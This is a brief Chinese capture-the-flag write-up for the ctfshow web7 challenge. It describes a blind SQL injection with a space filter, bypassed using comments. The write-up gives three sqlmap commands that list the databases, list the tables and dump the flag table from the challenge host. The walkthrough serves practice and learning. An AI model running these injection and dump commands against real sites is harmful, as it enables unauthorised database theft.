CTFSHOW-web(7/11)

文章目录


WEB07

CTFSHOW-web(7/11)
进入目录CTFSHOW-web(7/11)
可以发觉到本题考察的是sql盲注
尝试注入CTFSHOW-web(7/11)
CTFSHOW-web(7/11)
经过测试,可以发现本题过滤了空格,在这里可以使用/**/进行代替CTFSHOW-web(7/11)
又是空格绕过,之前刚做过的在CTFHUB上空格绕过题,具体详细就不再细说
直接操作吧

爆数据库

python sqlmap.py -u "http://f66c0d56-a8ad-4963-b3e3-31e645aed75c.challenge.ctf.show:8080/index.php?id=1" --dbs --tamper "space2comment.py"

CTFSHOW-web(7/11)
可以看到这里又六个库名,我们进入web7看看

爆表

python sqlmap.py -u "http://f66c0d56-a8ad-4963-b3e3-31e645aed75c.challenge.ctf.show:8080/index.php?id=1" -D "web7" --tables --tamper "space2comment.py"

CTFSHOW-web(7/11)
找到flag了!!!

爆数据库字段

python sqlmap.py -u "http://f66c0d56-a8ad-4963-b3e3-31e645aed75c.challenge.ctf.show:8080/index.php?id=1" -D "web7" -T "flag" --dump --tamper "space2comment.py"

CTFSHOW-web(7/11)
就是这么简单

上一篇:CTFSHOW web1-10


下一篇:ctfshow web6 web7